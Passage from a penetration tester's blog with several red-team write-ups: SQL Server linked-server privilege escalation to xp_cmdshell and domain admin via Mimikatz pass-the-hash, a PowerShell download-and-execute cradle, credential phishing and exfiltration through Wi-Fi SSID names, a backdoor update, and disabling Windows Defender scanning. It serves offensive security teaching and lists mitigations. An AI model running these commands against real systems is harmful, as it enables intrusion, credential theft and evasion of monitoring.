Now, to execute queries on the destination server (dps-sqlsrvtwo) we can use Openquery as suggested by Antti in the blog linked above. Let's see our current user and if we have sysadmin privileges:</div>
<pre><textarea cols="70" readonly="readonly" rows="4">select * from openquery("dps-sqlsrvtwo",'select @@version')
select * from openquery("dps-sqlsrvtwo",'select SUSER_NAME()')
select * from openquery("dps-sqlsrvtwo",'select IS_SRVROLEMEMBER(''sysadmin'')')
select * from openquery("dps-sqlsrvtwo",'select IS_SRVROLEMEMBER(''public'')')
</textarea></pre>
<br />
<div style="text-align: justify;">
Turns out that we have only public privileges with a user called dbuser and the target server is SQL Server 2016 SP1.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now, we can try various methods from PowerUpSQL for privilege escalation on SQL Server. The problem is we can't access dps-sqlsrvtwo directly and AFAIK, there is no way to execute these commands on a linked server using the tool. So, we need to try the methods manually, one by one. During the Red Team assessment, I found out a user which we can impersonate on a linked server. So, let's use that in our lab setup as well. To list all the users which we can impersonate from our current user can be listed using the following SQL query stolen directly from <a href="https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/">this amazing blog</a> by Scott. We are going to use the query inside Openquery so that it can be executed on the linked server:</div>
<pre><textarea cols="70" readonly="readonly" rows="2">select * from openquery("dps-sqlsrvtwo",'SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = ''IMPERSONATE''')
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHemM1gwzhxTeIhMEolsPvjtggremIkjdCXzN3ZdWG4wlrqRZDayYUMQtOR7rYYTbk6Tc8EcJskOeMQVZzRbs6EEffJL3m0hJRrA9NgAjpoYgM-w97JCAoo7cfJ0T4fodZ6lVsD7kG03c/s1600/linked_impersonation.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHemM1gwzhxTeIhMEolsPvjtggremIkjdCXzN3ZdWG4wlrqRZDayYUMQtOR7rYYTbk6Tc8EcJskOeMQVZzRbs6EEffJL3m0hJRrA9NgAjpoYgM-w97JCAoo7cfJ0T4fodZ6lVsD7kG03c/s400/linked_impersonation.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Looks like we can impersonate a user called "reportsuser". But a command like below is most likely to fail:</div>
<pre><textarea cols="70" readonly="readonly" rows="1">select * from openquery("dps-sqlsrvtwo",'EXECUTE AS LOGIN = ''reportsuser'';select IS_SRVROLEMEMBER(''sysadmin'')')
</textarea></pre>
<div style="text-align: justify;">
Why? Because, apparently, it is not possible to use EXECUTE AS without getting our privileges revert to the original 'dbuser'. I tried WITH NO REVERT option as well but soon realized that it may work only when sending the query directly to a database. Please see <a href="https://msdn.microsoft.com/en-us/library/ms181362.aspx">this MSDN documentation on EXECUTE AS</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
No luck there! Let's look for another interesting privilege escalation avenue - trustworthy database. Read this <a href="https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/">very useful blog</a>, once again by Scott, to understand more about trustworthy database. We can use the following query - taken from the blog referenced above - to enumerate trustworthy databases on the target linked server:</div>
<pre><textarea cols="70" readonly="readonly" rows="2">select * from openquery("dps-sqlsrvtwo",'SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;')</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0khDZlCLDGeJPliZtmYjNeZ8Oo1aHvxUxlbe-eY4iLwTsJr555FbF-t5iQveTRIFe_zzkLvYDwLD5cc4fwdZM3o_Vyhdux575WUEK0NBPm-xjg182MRZRzaoNQZF0o68pJnETPh9kj20/s1600/linked_trustworthy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0khDZlCLDGeJPliZtmYjNeZ8Oo1aHvxUxlbe-eY4iLwTsJr555FbF-t5iQveTRIFe_zzkLvYDwLD5cc4fwdZM3o_Vyhdux575WUEK0NBPm-xjg182MRZRzaoNQZF0o68pJnETPh9kj20/s400/linked_trustworthy.jpg" width="400" /></a></div>
<div style="text-align: justify;">
A trustworthy database 'reports_db'! Let's list users with db_owner role on the server:</div>
<pre><textarea cols="70" readonly="readonly" rows="4">select * from openquery("dps-sqlsrvtwo",'SELECT members.name as ''members_name'', roles.name as ''roles_name'' FROM sys.database_role_members rolemem INNER JOIN sys.database_principals roles ON rolemem.role_principal_id = roles.principal_id INNER JOIN sys.database_principals members ON rolemem.member_principal_id = members.principal_id where roles.name = ''db_owner'' ORDER BY members.name')</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Sdkb4Y75_U-ikrwIRf4ZfCKAHfreiFF4hPDskoABThBDGQ02IMWmqnhkLabsVHjg1fytdmOIR6UUgwnKnv-kip95QOcDnlHrUMU6H5Rf8FgXZtk2H809r86HfMJmETWBauDpNXQS1yE/s1600/linked_db_owner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Sdkb4Y75_U-ikrwIRf4ZfCKAHfreiFF4hPDskoABThBDGQ02IMWmqnhkLabsVHjg1fytdmOIR6UUgwnKnv-kip95QOcDnlHrUMU6H5Rf8FgXZtk2H809r86HfMJmETWBauDpNXQS1yE/s400/linked_db_owner.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Now, let's see if our current user - dbuser - is db_owner of reports_db on the linked server. In place of checking the role, let's try to create a stored procedure in the reports_db database which can help us in privilege escalation. Please note that to create a stored procedure RPC Out must be enabled for the linked server - which is not enabled by default but quite common in case of linked servers. The idea is to create a stored procedure which gets executed as OWNER which is the user 'sa'. Use below query to create a stored procedure on the linked database. </div>
<pre><textarea cols="70" readonly="readonly" rows="1">EXEC ('CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember ''dbuser'',''sysadmin''') AT "DPS-SQLSRVTWO"</textarea></pre>
Our stored procedure makes dbuser a sysadmin. Now, let's execute the stored procedure. <br />
<pre><textarea cols="70" readonly="readonly" rows="1">EXEC ('sp_escalate;SELECT IS_SRVROLEMEMBER(''sysadmin'');SELECT SUSER_NAME()') AT "DPS-SQLSRVTWO"</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0ml7IzkkiFkH8Y2ZA7kS5WH55gInsQUY4gPiwseo2NX2N3M5214kjIQq0HIQBMeHosjK5tuWB-bFlgCVbpl-zAZsC6kSb-O5D1bjn3sI_2eci8SWrQjnWO4TcVuVEeMXQHWbofDP-Pw0/s1600/linked_privEsc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0ml7IzkkiFkH8Y2ZA7kS5WH55gInsQUY4gPiwseo2NX2N3M5214kjIQq0HIQBMeHosjK5tuWB-bFlgCVbpl-zAZsC6kSb-O5D1bjn3sI_2eci8SWrQjnWO4TcVuVEeMXQHWbofDP-Pw0/s400/linked_privEsc.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Neat! Now we can access all databases and tables on the target server. PowerUpSQL provides very useful commands for pillaging a database (and that is what I used first in the assessment to capture some juicy data) but we are not going to use them. See <a href="https://blog.netspi.com/finding-sensitive-data-domain-sql-servers-using-powerupsql/">this blog post</a> for details about that.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In many cases, this is one of the major goals of red team assessments, staying within the database layer we have access to multiple SQL servers across forest trust and juicy information stored within them. Since we have not done anything very unusual or noisy up to now, there are very low chances of detection. In fact, in my lab I have Microsoft Advanced Threat Analytics (ATA) set up and there was no detection of the attack. Obviously, because we did not communicate to the domain controller at all and ATA looks at only the DC traffic. Take that ATA!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Since, RPC Out is enabled on the linked server and we have sysadmin privileges, it is possible to enable xp_cmdshell and achieve OS command execution! Please note that if xp_cmdshell was already enabled on the linked server, we could execute OS commands without RPC Out while using only Openquery! Use below to enable xp_cmdshell</div>
<pre><textarea cols="70" readonly="readonly" rows="1">EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "dps-sqlsrvtwo"</textarea></pre>
And let's see the privileges of the database process:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIRvMu5EPiM8U8myFaPlMvO2Ayz9mk0ZzBp2cd17w39WQ6OS4MltHs7dOdr6lNB1dF1kD_UO7ci5Qq4zCfb5mwT0Nytve13jz7b_XMghpPXZbYAIgyvtA9aAGzbKWvH47Qq3PUvsspt4E/s1600/whoami_sqlsrvtwo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIRvMu5EPiM8U8myFaPlMvO2Ayz9mk0ZzBp2cd17w39WQ6OS4MltHs7dOdr6lNB1dF1kD_UO7ci5Qq4zCfb5mwT0Nytve13jz7b_XMghpPXZbYAIgyvtA9aAGzbKWvH47Qq3PUvsspt4E/s400/whoami_sqlsrvtwo.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Great! Looks like the SQL server process is running with a domain user (sqlprodadmin) privileges. We can now hunt for a DA token from the normal domain user privileges we have on dps-sqlsrvtwo. Let's use the awesome PowerView for the DA token hunting. Remember that we cannot access our linked server dps-sqlsrvtwo directly and we do not have command execution on dps-sqlsrvdev. To load PowerView on dps-sqlsrvtwo, we can download and execute it in memory using PowerShell one-liner.</div>
<pre><textarea cols="70" readonly="readonly" rows="1">iex (New-Object Net.WebClient).DownloadString('http://yourwebserver/PowerView.ps1')</textarea></pre>
<div style="text-align: justify;">
The one-liner needs to be encoded so that the URL doesn't mess up with the syntax of SQL query. Also, make sure that PowerView is modified a bit to include call to functions in the script itself and to receive the output the function calls must be piped to Out-Host.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikT_myyIYofxqXmQbfxKXyvZ2wZLeT1BGSz0qG_2keo00yckdyLVul2qlW8Tq2dWG8xqI__Hq2HejjGPHv5JUPQ-VLnRPpBtkR0kVxCFKe9ewGjTKrdHXDAawm0OX81XtxTOh51zoMKfE/s1600/DA-PowerView.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikT_myyIYofxqXmQbfxKXyvZ2wZLeT1BGSz0qG_2keo00yckdyLVul2qlW8Tq2dWG8xqI__Hq2HejjGPHv5JUPQ-VLnRPpBtkR0kVxCFKe9ewGjTKrdHXDAawm0OX81XtxTOh51zoMKfE/s400/DA-PowerView.jpg" width="400" /></a></div>
<div style="text-align: justify;">
And let's execute the encoded command:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj98Wvi-6mT7ohzKuyvwlU1IAkuUILKr_xL5JKcnNiqMz4QNlYKSu3cn5zF1ZJN9PlEQl5aaY5ROnByx8MQo6b2v43qAPRlIuaLz4jq60uWm0kiWvM_afONcl1fNedxytVSx0AX6XT1JSo/s1600/DA-UserHunting.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj98Wvi-6mT7ohzKuyvwlU1IAkuUILKr_xL5JKcnNiqMz4QNlYKSu3cn5zF1ZJN9PlEQl5aaY5ROnByx8MQo6b2v43qAPRlIuaLz4jq60uWm0kiWvM_afONcl1fNedxytVSx0AX6XT1JSo/s400/DA-UserHunting.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Awesome! Looks like on the server dps-srvjump a DA token is available and our current user has local admin access. Let's dump NTLM hash of the DA - Administrator from dps-srvjump using Invoke-Mimikatz.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitUF3WmGhyphenhyphenASz8YdHYSgD11Zv_7Onp5xcwYrYeZ3cHogslb_z_x3vSKh0AvJmAfogF9wP2kEHNZVP9IoQzGbGPRuesJugMTpkN_Xahs20xCaBnmlNXIyQVT7ww9zc_qiZAvZ-HpX0O3tY/s1600/DA-Hashes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitUF3WmGhyphenhyphenASz8YdHYSgD11Zv_7Onp5xcwYrYeZ3cHogslb_z_x3vSKh0AvJmAfogF9wP2kEHNZVP9IoQzGbGPRuesJugMTpkN_Xahs20xCaBnmlNXIyQVT7ww9zc_qiZAvZ-HpX0O3tY/s400/DA-Hashes.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Finally, let's use these hashes with Invoke-Mimikatz to run a command on the DC of defensiveps. The DC of defensiveps is accessible from our machine in the offensiveps forest.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-Mimikatz -Command '"sekurlsa::pth user:Administrator /domain:defensiveps.com /ntlm:ntlmhash /run:powershell.exe"
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_pPAx5eiCrzU6SwH-OzzRZlSe5nl6V7PhIAbxdVi7hNY0bPCarwKaxGW0elG_mlXMpIIh0KCTUKVMwrmFyeo86SWly23uI-J6DHPgAkChqqhUizHVN7XYIIHbJde54zsuU4sJt8kQ1Ww/s1600/DA-Command.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_pPAx5eiCrzU6SwH-OzzRZlSe5nl6V7PhIAbxdVi7hNY0bPCarwKaxGW0elG_mlXMpIIh0KCTUKVMwrmFyeo86SWly23uI-J6DHPgAkChqqhUizHVN7XYIIHbJde54zsuU4sJt8kQ1Ww/s400/DA-Command.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Bingo! DA access in the target forest!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We started with a non-admin domain user and worked our way to multiple SQL Servers while staying only at the database layer. We also got domain admin/enterprise admin in a trusting forest! :)</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Mitigations</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
SQL Server Level </div>
<div style="text-align: justify;">
Multiple common mitigations like having limited linked databases and not enabling RPC Out on linked servers would have helped. Also, restricted allocation of privileges, even the public login, will help. One of the databases we encountered later on was running with a domain user's privileges. This is disastrous as it opens up many opportunities for privilege escalation on the domain level! Restricting privileges with which the database processes run is always desired. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Forest Level</div>
<div style="text-align: justify;">
Many improvements can be made. Allowing a local administrator on a box where a Domain Admin can log in is very very dangerous and results in disastrous situations like the one we saw above. If there is a box where DAs' privileges are required no other administrative account should be present. Logs will also tell you about a successful DA authentication from a forest if someone is looking for such information. Also, Selective Authentication can help in forest trust scenarios. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A note on ATA</div>
<div style="text-align: justify;">
I have <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-explore/what-is-ata">Microsoft ATA</a> setup in the lab where all the attacks took place. Since, ATA is the new sheriff in town let's discuss it a bit. ATA detect anomalies by looking at the traffic destined to the DC(s) by port mirroring. If we can limit ourselves to those attacks and techniques where there is no or minimal interaction with a DC, it is possible to avoid ATA and still get access to the most interesting machines and information. ATA thrives on Red Teamer/attacker's desire of going for DA rights as soon as possible. It is not always necessary to go after DA and use Golden ticket/Skeleton key/Credentials replay attacks for achieving the goal of an assessment unless, of course, you want to brag about it in your report :D Of course, there are bypasses for ATA as well but why bypass it when you can avoid it :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Hope you enjoyed the post. Please leave comments, feedback and questions.</div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com7tag:blogger.com,1999:blog-8135211063584500909.post-42300260959935427652016-11-22T02:07:00.001+05:302018-01-14T22:48:14.897+05:30Exfiltration of User Credentials using WLAN SSID<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I was playing with Windows Hosted Network feature couple of days back. A hopefully useful idea which came to my mind was using the name of the hosted SSID for exfiltration. Since, SSID names support maximum 32 bytes the choice of data to exfiltrate is not really wide. Something like user credentials is small enough to fit in this limited space.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I wrote a PowerShell script which allows use to exfiltrate data using only SSID names. I give you <b>Invoke-SSIDExfil.ps1</b>. <a href="https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SSIDExfil.ps1">Here is the source code.</a> This script provides for multiple options to exfiltrate data. Since, we are mostly after user credentials, the script uses logic from Invoke-CredentialsPhish to show a credentials prompt to the user to capture credentials in clear text. The captured credentials are then encoded using ROT13 (not going to call ROT13 encryption though that may be the technically correct term) and a Windows Hosted Network is created and started with SSID name set as to the encoded value in the form Domain:Username:Password. Below is the script in action. Please note that the script must be executed from an elevated shell:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-SSIDExfil -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_IgCE6rSCZlvTkfsg18QyUQ3DLMHnPvOBnhW0_kAI-giFzBNvQ3hBQvM42DbufuWfLKi4sZ8BfcBF_BGzFONFzRrFyGoaEXAEGm4tQK_OL93Rb8z9ZTgkkY4dnIgIDP5ODA0RswbjBEo/s1600/screenshot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_IgCE6rSCZlvTkfsg18QyUQ3DLMHnPvOBnhW0_kAI-giFzBNvQ3hBQvM42DbufuWfLKi4sZ8BfcBF_BGzFONFzRrFyGoaEXAEGm4tQK_OL93Rb8z9ZTgkkY4dnIgIDP5ODA0RswbjBEo/s400/screenshot.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And this is how - if we are in <b>physical proximity</b> of the target - the SSID looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD1XRT0w91555EkZ1vl9v8JlERRGCUpe0BqqedhvFWJ1uwzf8QtTfUCIy53AJ0lUfpMUSfmgVogn_74-KMZXFTrRxMURk0fJxnNMjSjTr75-IlB7vgKoHVjRLxmRfX66Z1FNl0a93T4zk/s1600/mobile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD1XRT0w91555EkZ1vl9v8JlERRGCUpe0BqqedhvFWJ1uwzf8QtTfUCIy53AJ0lUfpMUSfmgVogn_74-KMZXFTrRxMURk0fJxnNMjSjTr75-IlB7vgKoHVjRLxmRfX66Z1FNl0a93T4zk/s320/mobile.png" width="288" /></a></div>
Now, we can decode the user credentials using Invoke-SSIDExfil script's -Decode option.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjArY9cvg590Xy5dN4VcwqtfmvhB5_P4GpfW9LQA3g9mWf9WLH-anFLvKR9DNaf_ieezWlITiDUkmH8M-poi0low5O2tY4UN2Sm56ZRvN_w77agxqXRyw_rxEprU-nG0hFthNWQcOhXqss/s1600/decode.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjArY9cvg590Xy5dN4VcwqtfmvhB5_P4GpfW9LQA3g9mWf9WLH-anFLvKR9DNaf_ieezWlITiDUkmH8M-poi0low5O2tY4UN2Sm56ZRvN_w77agxqXRyw_rxEprU-nG0hFthNWQcOhXqss/s400/decode.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Neat! From my past experience, such scripts are useful for impressive demonstrations.<br />
<br />
<div style="text-align: justify;">
The script can be used as a payload in targeted client side attacks, Human Interface Devices (<a href="https://github.com/samratashok/Kautilya">Kautilya</a>), authenticated command execution and other techniques. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Using the -StringToExfiltrate and -ExfilOnly parameters, it is also possible to exfiltrate a small piece of data without showing a credential prompt to the user. </div>
<br />
<b>An update to the Gupt-Backdoor</b><br />
<br />
<div style="text-align: justify;">
While working on this script, I revisited Gupt-Backdoor. That backdoor is quite impressive as well when it comes to demonstrations. I <a href="http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html">blogged about it here</a>. An improvement to that backdoor has been added which allows to pass a one line PowerShell downloand and execute cradle for PowerShell v3 onwards. Also, ROT13 encoding has been implemented to make SSID names less suspicious. Below command can be used to start the backdoor on a target and tell that an encoded command will be provided to it:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Gupt-Backdoor -MagicString op3n -EncodedCmd -Verbose
</textarea></pre>
And this is how a Wireless AP can be started to send instructions to the backdoor.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwGLbJMNwtvGNySaxMvJaAIU0lRdOklvC30VbH4jsU0f4CkO93gQHa6ZHsGpk1LL0no-qRyVCkOuSxjL52LQ-3RzXteS8u8fxM1il8eO_GZj4mLf1_KMCmiIQD7DPhetF4MCRSHomcjDc/s1600/gupt-instructions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwGLbJMNwtvGNySaxMvJaAIU0lRdOklvC30VbH4jsU0f4CkO93gQHa6ZHsGpk1LL0no-qRyVCkOuSxjL52LQ-3RzXteS8u8fxM1il8eO_GZj4mLf1_KMCmiIQD7DPhetF4MCRSHomcjDc/s400/gupt-instructions.png" width="225" /></a></div>
<br />
And the execution looks like below. The backdoor downloads and executes Get-WLAN-Keys from Nishang:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1g3WoQpOSaphlT3_qQ5WCVEQGEQolOOIp-NHVBlz_of2BKbold4G-nkQ_x0kU3zQ5Nz8oMAb1MhIRhIqIcFmYvELCyjFkMP6Hg7hKvoNtdVhE9WNEVJYGrS0SZOL9_BdWL-d51fGPKmc/s1600/gupt-execution.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1g3WoQpOSaphlT3_qQ5WCVEQGEQolOOIp-NHVBlz_of2BKbold4G-nkQ_x0kU3zQ5Nz8oMAb1MhIRhIqIcFmYvELCyjFkMP6Hg7hKvoNtdVhE9WNEVJYGrS0SZOL9_BdWL-d51fGPKmc/s400/gupt-execution.jpg" width="400" /></a></div>
Small but useful improvements!<br />
<br />
Hope you enjoyed the post! Please leave feedback and comments.<br />
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com1tag:blogger.com,1999:blog-8135211063584500909.post-63950474315333030362016-09-21T22:35:00.002+05:302018-01-14T22:48:14.999+05:30AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It<div dir="ltr" style="text-align: left;" trbidi="on">
Update (23-Dec-2016) - I have implemented the publicly known AMSI bypasses described in this post in a PowerShell script <b>Invoke-AmsiBypass</b>. Check it out here <a href="https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1">https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1</a><br />
<br />
<br />
Last month I gave a talk about Microsoft's AntiMalware Scan Interface (AMSI) at Black Hat USA. The talk and this post details my experiments with AMSI.<br />
<br />
I first encountered AMSI while using some of the PowerShell scripts from Nishang on a Windows 10 box in my lab. I noticed that some of the scripts didn't work even if loaded from memory which was very interesting. Being a long time user of PowerShell in my pen tests, I was interested in the technique being used to detect scripts from Nishang in memory. After a quick search, I stumbled upon this excellent <a href="https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/">TechNet article</a> which introduces AMSI. From that article, <a href="https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/">this</a> article and <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx">documentation</a> of AMSI, following detection abilities and features are claimed with AMSI:<br />
<ul style="text-align: left;">
<li>Memory and Stream scanning. This means that the input method - disk, memory/stream or manual input makes no difference on the detection capabilities.</li>
<li>Scripts are submitted to the AntiVirus/AntiMalware product by AMSI when the de-obfuscated plain code is presented to the script host. This means that obfuscation should help only to a limited extent. </li>
<li>Since the scripts are "picked up" when submitted to the scripting host, code which doesn't utilize powershell.exe but uses System.Automation DLL will also be analyzed. </li>
</ul>
<br />
And when I tested AMSI with different tools and techniques, detection rate was indeed better than what I expected.<br />
<h4 style="text-align: left;">
Major techniques which were tested and detected by AMSI:</h4>
<br />
<b>Executing scripts from memory</b> - Using the -EncodedCommand parameter of powershell.exe and the famous one liner download-execute.<br />
<br />
Execution of everyone's favorite, Invoke-Mimikatz:<br />
When AMSI was disabled:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Set-MpPreference -DisableIOAVProtection $true
</textarea></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_zTGv-KLvlGJoyfmKu0Ec0XP1B9Pwrgve9YMdwoRfmjpJE7sADJ4rzvR2OtzdgybYcnDgP8awKBylUzi_c6aETeURLuw19eywZ7WBdm9KMn-l7Dusw80rvEtqBH6VIuM6N7TyeStceB4/s1600/AMSI_Disabled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_zTGv-KLvlGJoyfmKu0Ec0XP1B9Pwrgve9YMdwoRfmjpJE7sADJ4rzvR2OtzdgybYcnDgP8awKBylUzi_c6aETeURLuw19eywZ7WBdm9KMn-l7Dusw80rvEtqBH6VIuM6N7TyeStceB4/s400/AMSI_Disabled.jpg" width="400" /></a></div>
<span id="goog_1862847246"></span><span id="goog_1862847247"></span><br />
When AMSI was enabled (default on Windows 10):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5IVd9O-sIlZIhfEBSTPdeGI_x_WqF-QBuATra6TCv2QxZVEr7GY-WyUxl3ihG9pr8XWHoKlJR1aooPVYWxH5hO_hnwudP478u0Vr-UrEizvC7CCznp3zRYPzCbfNRaI6eGKkdgaw2WE/s1600/AMSI_ENabled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5IVd9O-sIlZIhfEBSTPdeGI_x_WqF-QBuATra6TCv2QxZVEr7GY-WyUxl3ihG9pr8XWHoKlJR1aooPVYWxH5hO_hnwudP478u0Vr-UrEizvC7CCznp3zRYPzCbfNRaI6eGKkdgaw2WE/s400/AMSI_ENabled.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0VN6O9y4UjxiiKqsG_rcEjr1Sg2-zMM5koFAxSqPqtZvDcGehosPJ-K5mU6dO3ozVv4JgWlgxXM1VH2v18LDsNTbbQwbSvmJ3LjXDd3bcJVc7lHhyphenhyphen7vHSm4TY9JtPTyG6b722xXHOMA0/s1600/AMSI_Enabled_Threat.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0VN6O9y4UjxiiKqsG_rcEjr1Sg2-zMM5koFAxSqPqtZvDcGehosPJ-K5mU6dO3ozVv4JgWlgxXM1VH2v18LDsNTbbQwbSvmJ3LjXDd3bcJVc7lHhyphenhyphen7vHSm4TY9JtPTyG6b722xXHOMA0/s400/AMSI_Enabled_Threat.jpg" width="400" /></a></div>
<br />
<br />
